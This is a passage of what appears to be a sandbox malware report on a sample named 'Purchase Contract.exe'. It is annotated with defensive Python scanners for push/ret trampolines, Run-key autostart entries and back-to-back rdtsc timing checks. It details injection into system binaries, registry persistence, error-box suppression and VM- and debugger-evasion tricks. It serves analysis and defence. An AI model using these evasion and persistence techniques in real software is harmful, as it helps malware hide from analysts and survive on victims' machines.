Source: Binary string: wntdll.pdbUGP source: Purchase Contract.exe, 00000000.00000002.814464607.0000000005D30000.00000040.00000001.sdmp, control.exe, 00000003.00000002.2008031582.00000000045AF000.00000040.00000001.sdmp, updategtmlg.exe, 0000000D.00000002.1174356895.00000000062DF000.00000040.00000001.sdmp, cmmon32.exe, 0000000E.00000002.1171387497.0000000004ECF000.00000040.00000001.sdmp, updategtmlg.exe, 0000000F.00000002.1185902885.0000000005340000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.1184353663.0000000004910000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Purchase Contract.exe, control.exe, updategtmlg.exe, cmmon32.exe, updategtmlg.exe, 0000000F.00000002.1185902885.0000000005340000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.1184353663.0000000004910000.00000040.00000001.sdmp
Source: Binary string: control.pdbUGP source: Purchase Contract.exe, 00000000.00000002.809957748.000000000125B000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.784714178.0000000007010000.00000002.00000001.sdmp
Note: none of these are the malware's own symbols. control.pdb inside Purchase Contract.exe's memory and cmmon32.pdb inside updategtmlg.exe's memory show that each stage reads the system binary it is about to inject into (control.exe on the first run, cmmon32.exe from the persisted copy). wntdll.pdb turning up in every payload process at non-standard bases (0x5D30000 in the sample, 0x45AF000 in control.exe, 0x4ECF000 in cmmon32.exe) is consistent with the payload mapping its own fresh copy of ntdll to call system services around user-mode API hooks, a documented Formbook trait. wscui.pdb belongs to the Security Center UI loaded in explorer.exe and is unrelated.

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_00A62AC2 push eax; ret 0_2_00A62AC3
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05DADE2D push ecx; ret 0_2_05DADE40
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0450DE2D push ecx; ret 3_2_0450DE40
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02979A82 push eax; ret 3_2_02979A88
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02979A8B push eax; ret 3_2_02979AF2
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_029652F9 pushfd ; retf 3_2_029652EA
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02979AEC push eax; ret 3_2_02979AF2
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_029652E9 pushfd ; retf 3_2_029652EA
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0296521A push esi; iretd 3_2_02965226
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02979A35 push eax; ret 3_2_02979A88
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0296D9CD push ds; retf 3_2_0296D9CE
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_00EE2AC2 push eax; ret 13_2_00EE2AC3
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0623DE2D push ecx; ret 13_2_0623DE40
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E2DE2D push ecx; ret 14_2_04E2DE40
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C2D9CD push ds; retf 14_2_00C2D9CE
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C252E9 pushfd ; retf 14_2_00C252EA
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C39AEC push eax; ret 14_2_00C39AF2
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C252F9 pushfd ; retf 14_2_00C252EA
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C39A82 push eax; ret 14_2_00C39A88
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C39A8B push eax; ret 14_2_00C39AF2
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C2521A push esi; iretd 14_2_00C25226
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C39A35 push eax; ret 14_2_00C39A88
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C33BEB push ebx; retf 14_2_00C33BEE
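The push/ret pairs listed above are jumps written without a jmp or call: the target is pushed and the ret pops it into EIP, so a control-flow graph built from branch instructions never sees the edge (pushfd/retf, push ds/retf and push esi/iretd do the same thing through a far or interrupt return). The scanner below is added here as an example and is not part of the Joe Sandbox report or the sample. It walks raw x86 code bytes for a push opcode followed by ret, retf or iretd, optionally with a few bytes in between (the report's 3_2_02979A82 push and 3_2_02979A88 ret have five), and resolves the target when the push carries an immediate. The byte string it scans is constructed for the example. A raw-byte sweep like this is a triage heuristic: it also fires on bytes inside data or immediates, which a real disassembler such as capstone would avoid.

```python
"""push/ret trampoline finder for raw x86 code bytes (added example).

A `push X; ret` pair transfers control to X without a jmp or call, so a
control-flow graph built from branch instructions misses the edge. This is a
byte-level triage heuristic, not a disassembler: it will also fire on bytes
inside data or immediates.
"""
from dataclasses import dataclass
from typing import List, Optional

# push r32 is a single byte, 0x50 + register number.
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
SINGLE_BYTE_PUSH = {0x06: "push es", 0x0E: "push cs", 0x16: "push ss",
                    0x1E: "push ds", 0x9C: "pushfd"}
RET_OPCODES = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


@dataclass
class Hit:
    offset: int            # address of the push (base + offset in blob)
    text: str              # disassembly of the pair
    target: Optional[int]  # static jump target, only known for push imm; ret


def scan_push_ret(code: bytes, base: int = 0, max_gap: int = 0) -> List[Hit]:
    """Report every push that is followed, within max_gap bytes, by a return.

    max_gap=0 accepts only adjacent pairs; the report pairs a push with a ret
    a few bytes later, so a small gap is realistic.
    """
    hits: List[Hit] = []
    n, i = len(code), 0
    while i < n:
        op = code[i]
        push_len, push_txt, target = 0, None, None
        if 0x50 <= op <= 0x57:
            push_len, push_txt = 1, f"push {REGS[op - 0x50]}"
        elif op in SINGLE_BYTE_PUSH:
            push_len, push_txt = 1, SINGLE_BYTE_PUSH[op]
        elif op == 0x68 and i + 5 <= n:                 # push imm32
            target = int.from_bytes(code[i + 1:i + 5], "little")
            push_len, push_txt = 5, f"push 0x{target:08x}"
        elif op == 0x6A and i + 2 <= n:                 # push imm8, sign-extended
            imm = code[i + 1]
            target = imm if imm < 0x80 else imm | 0xFFFFFF00
            push_len, push_txt = 2, f"push 0x{target:08x}"
        if push_txt is None:
            i += 1
            continue
        j = i + push_len
        for k in range(j, min(n, j + max_gap + 1)):
            if code[k] in RET_OPCODES:
                gap = k - j
                sep = "; " if gap == 0 else f"; <{gap} bytes>; "
                hits.append(Hit(base + i, f"{push_txt}{sep}{RET_OPCODES[code[k]]}", target))
                i = k + 1
                break
        else:
            i += 1   # no return within the window; keep sweeping byte by byte
    return hits


# Constructed code bytes for the example; not taken from the sample.
SAMPLE = bytes([
    0x55, 0x8B, 0xEC,                    # push ebp; mov ebp, esp (ordinary prologue)
    0x68, 0x78, 0x56, 0x34, 0x12, 0xC3,  # push 0x12345678; ret  -> jmp 0x12345678
    0x50, 0xC3,                          # push eax; ret         -> jmp eax
    0x9C, 0xCB,                          # pushfd; retf
    0x1E, 0xCB,                          # push ds; retf
    0x56, 0xCF,                          # push esi; iretd
    0x90, 0x90,                          # nop; nop
    0x51, 0x83, 0xC0, 0x01, 0xC3,        # push ecx; add eax, 1; ret (gap of 3)
])

if __name__ == "__main__":
    for hit in scan_push_ret(SAMPLE, base=0x02979A00, max_gap=4):
        where = f"-> 0x{hit.target:08x}" if hit.target is not None else "-> runtime value"
        print(f"{hit.offset:08X}  {hit.text:28s} {where}")
```

A `push reg; ret` hit has no static target, which is exactly why it defeats static control-flow recovery; the register value has to come from a debugger, an emulator, or the sandbox trace that produced the lines above.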

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\explorer.exe, File created: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exe

Boot Survival:

Creates an autostart registry key
Source: C:\Windows\SysWOW64\control.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 6LDTLHHPCD (2 occurrences)
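For the Run-key entry above (HKEY_CURRENT_USER\...\Run, value name 6LDTLHHPCD, written by the injected control.exe), the follow-up a responder wants is a quick triage of every autostart value on a host. The example below is added here and is not Joe Sandbox code. classify_run_entries() applies three heuristics that are assumptions made for this example rather than a vendor rule set (a random-looking value name, a command that starts from a user-writable directory, a command that goes through a script host or LOLBin) and works offline on exported data; collect_run_entries() reads the live keys through winreg and only runs on Windows. The sample entries are constructed, and the command stored under 6LDTLHHPCD is an assumption, since the report shows the value name but not its data.

```python
"""Autostart (Run key) triage (added example, not Joe Sandbox code).

classify_run_entries() is pure Python and runs anywhere on exported data;
collect_run_entries() reads the live keys through winreg and needs Windows.
The heuristics are assumptions made for this example, not a vendor rule set.
"""
import re
import sys
from typing import Dict, List, Tuple

Entry = Tuple[str, str, str, str]  # (hive, key path, value name, command)

RUN_KEYS = [
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    # 32-bit processes on 64-bit Windows land here when they write HKLM\...\Run.
    ("HKLM", r"Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run"),
]

# Value names like 6LDTLHHPCD: 8-16 upper-case letters/digits, no words.
RANDOM_NAME = re.compile(r"^[A-Z0-9]{8,16}$")
# Commands that start from places a non-admin user can write to.
USER_WRITABLE = re.compile(
    r"\\(AppData|Temp|ProgramData|Users\\[^\\]+\\(Desktop|Downloads|Documents))\\", re.I)
# Autostart via a script host or living-off-the-land binary.
LOLBINS = ("cmd.exe", "powershell", "wscript", "cscript", "mshta", "rundll32", "regsvr32")


def classify_run_entries(entries: List[Entry]) -> List[Dict]:
    """Return one finding per entry that trips at least one heuristic."""
    findings = []
    for hive, key, name, command in entries:
        reasons = []
        if RANDOM_NAME.match(name):
            reasons.append("random-looking value name")
        if USER_WRITABLE.search(command):
            reasons.append("runs from a user-writable location")
        if any(b in command.lower() for b in LOLBINS):
            reasons.append("launches a script host or LOLBin")
        if reasons:
            findings.append({"location": f"{hive}\\{key}\\{name}",
                             "command": command, "reasons": reasons})
    return findings


def collect_run_entries() -> List[Entry]:
    """Enumerate the Run/RunOnce values on a live Windows host."""
    if sys.platform != "win32":
        raise RuntimeError("live collection needs Windows; feed exported data to classify_run_entries()")
    import winreg  # only available on Windows
    hives = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}
    entries: List[Entry] = []
    for hive, path in RUN_KEYS:
        try:
            key = winreg.OpenKey(hives[hive], path)
        except OSError:          # key absent (e.g. RunOnce never created)
            continue
        with key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:  # ERROR_NO_MORE_ITEMS
                    break
                entries.append((hive, path, name, str(data)))
                index += 1
    return entries


# Constructed entries; the command under 6LDTLHHPCD is an assumption, the
# report shows only the value name.
SAMPLE_ENTRIES: List[Entry] = [
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run", "6LDTLHHPCD",
     r'"C:\Program Files (x86)\S-zzxp\updategtmlg.exe"'),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"%windir%\system32\SecurityHealthSystray.exe"),
]

if __name__ == "__main__":
    data = collect_run_entries() if sys.platform == "win32" else SAMPLE_ENTRIES
    for f in classify_run_entries(data):
        print(f["location"], "->", f["command"], "|", ", ".join(f["reasons"]))
```

The OneDrive entry is flagged on purpose: legitimate per-user software also starts from AppData, so the location heuristic is a prompt to check the file's signer and hash, not a verdict. The 6LDTLHHPCD entry trips only the name heuristic here because its assumed command lives under Program Files (x86), which matches where the report's later processes run from.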

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\Purchase Contract.exe, Process information set: NOOPENFILEERRORBOX (12 occurrences)
Source: C:\Windows\explorer.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, Process information set: NOOPENFILEERRORBOX (24 occurrences)
SEM_NOGPFAULTERRORBOX suppresses the crash (Windows Error Reporting) dialog and SEM_NOOPENFILEERRORBOX the missing-file critical-error box, so a stage that fails in the injected control.exe or cmd.exe dies silently instead of showing the user a dialog.

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Purchase Contract.exe, RDTSC instruction interceptor: first address 0000000005377244, second address 000000000537724A, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Purchase Contract.exe, RDTSC instruction interceptor: first address 00000000053774AE, second address 00000000053774B4, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe, RDTSC instruction interceptor: first address 0000000002967244, second address 000000000296724A, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe, RDTSC instruction interceptor: first address 00000000029674AE, second address 00000000029674B4, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, RDTSC instruction interceptor: first address 00000000057C7244, second address 00000000057C724A, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, RDTSC instruction interceptor: first address 00000000057C74AE, second address 00000000057C74B4, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, RDTSC instruction interceptor: first address 00000000049A7244, second address 00000000049A724A, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, RDTSC instruction interceptor: first address 00000000049A74AE, second address 00000000049A74B4, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe, RDTSC instruction interceptor: first address 0000000000C27244, second address 0000000000C2724A, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe, RDTSC instruction interceptor: first address 0000000000C274AE, second address 0000000000C274B4, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe, RDTSC instruction interceptor: first address 00000000007C7244, second address 00000000007C724A, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe, RDTSC instruction interceptor: first address 00000000007C74AE, second address 00000000007C74B4, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
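The interceptor lines above show the classic two-read timing check: rdtsc, park the low dword in ECX (xor ecx, ecx; add ecx, eax is just mov ecx, eax written differently), rdtsc again. The second address minus the first (for example 0x537724A - 0x5377244) is exactly the 6 bytes those three instructions occupy. Under a hypervisor or a single-stepping debugger the second read lands far later than on bare metal, and checks of this kind compare the delta against a threshold to decide whether to misbehave. The scanner below is an added example, not part of the report: it finds rdtsc (0F 31) reads that sit within a configurable window of each other, decodes the handful of instructions typically found between them with a tiny opcode table, and shows the pairing the sandbox reports. The code bytes are constructed, and the cmp threshold in them is invented for the example, since the report does not show the comparison.

```python
"""Back-to-back rdtsc finder (added example, not part of the report).

Two rdtsc reads a few bytes apart, with the first result parked in another
register, are the signature of a timing check: the delta is large under a
hypervisor or single-stepping debugger.
"""
from typing import Dict, List

RDTSC = b"\x0f\x31"

# Tiny opcode table for the instructions that typically sit between the two
# reads. Anything else is emitted as a raw byte; use a real disassembler
# (e.g. capstone) for production work.
TWO_BYTE = {
    b"\x31\xc9": "xor ecx, ecx", b"\x01\xc1": "add ecx, eax",
    b"\x89\xc1": "mov ecx, eax", b"\x8b\xc8": "mov ecx, eax",
    b"\x29\xc8": "sub eax, ecx", b"\x2b\xc1": "sub eax, ecx",
    b"\x0f\xa2": "cpuid",
}


def decode_between(buf: bytes) -> List[str]:
    """Decode the bytes between two rdtsc reads with the table above."""
    out, i = [], 0
    while i < len(buf):
        if buf[i:i + 2] in TWO_BYTE:
            out.append(TWO_BYTE[buf[i:i + 2]])
            i += 2
        elif buf[i] == 0x3D and i + 5 <= len(buf):          # cmp eax, imm32
            imm = int.from_bytes(buf[i + 1:i + 5], "little")
            out.append(f"cmp eax, 0x{imm:x}")
            i += 5
        elif buf[i] == 0x90:
            out.append("nop")
            i += 1
        else:
            out.append(f"db 0x{buf[i]:02x}")
            i += 1
    return out


def find_rdtsc_pairs(code: bytes, window: int = 32, base: int = 0) -> List[Dict]:
    """Pair each rdtsc with the next one if it lies within `window` bytes."""
    offsets, pos = [], code.find(RDTSC)
    while pos != -1:
        offsets.append(pos)
        pos = code.find(RDTSC, pos + 2)
    pairs = []
    for first, second in zip(offsets, offsets[1:]):
        if second - first <= window:
            pairs.append({"first": base + first, "second": base + second,
                          "gap": second - first,
                          "between": decode_between(code[first + 2:second])})
    return pairs


# Constructed code bytes; the 0x10000 threshold is invented for the example.
SAMPLE = (
    bytes.fromhex("0f31")          # rdtsc             eax = low dword of TSC
    + bytes.fromhex("31c9")        # xor ecx, ecx
    + bytes.fromhex("01c1")        # add ecx, eax      ecx = first reading
    + bytes.fromhex("0f31")        # rdtsc             second reading
    + bytes.fromhex("29c8")        # sub eax, ecx      eax = cycles elapsed
    + bytes.fromhex("3d00000100")  # cmp eax, 0x10000  too slow -> assume sandbox
    + b"\x90" * 24                 # unrelated code
    + bytes.fromhex("0f31")        # a lone rdtsc with no partner nearby
)

if __name__ == "__main__":
    for p in find_rdtsc_pairs(SAMPLE, base=0x05377244):
        print(f"rdtsc at {p['first']:08X}, again at {p['second']:08X} "
              f"({p['gap']} bytes apart): {'; '.join(p['between'])}")
```

With the default 32-byte window only the first pair is reported, which is the right outcome: the trailing rdtsc has no partner and is the kind of single read that seeds a PRNG or stamps a log. A wider window also pairs the second read of the check with that lone one, so the window is a precision knob to tune against the code base at hand.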
Contains capabilities to detect virtual machines
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0 (value 0 holds the first disk's hardware ID, which names the virtual disk vendor on VMware, VirtualBox and QEMU guests)
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Purchase Contract.exe, Code function: 0_2_05E25595 rdtsc 0_2_05E25595
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Purchase Contract.exe, API coverage: 2.3 %
Source: C:\Windows\SysWOW64\control.exe, API coverage: 4.8 %
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, API coverage: 2.4 %
Source: C:\Windows\SysWOW64\cmmon32.exe, API coverage: 2.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Purchase Contract.exe, TID: 5016, Thread sleep time: -30000s >= -30000s
Source: C:\Windows\explorer.exe, TID: 2884, Thread sleep time: -68000s >= -30000s
Source: C:\Windows\SysWOW64\control.exe, TID: 1820, Thread sleep count: 61 > 30
Source: C:\Windows\SysWOW64\control.exe, TID: 1820, Thread sleep time: -305000s >= -30000s
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, TID: 4508, Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, TID: 4812, Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe, Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed (2 occurrences)
May t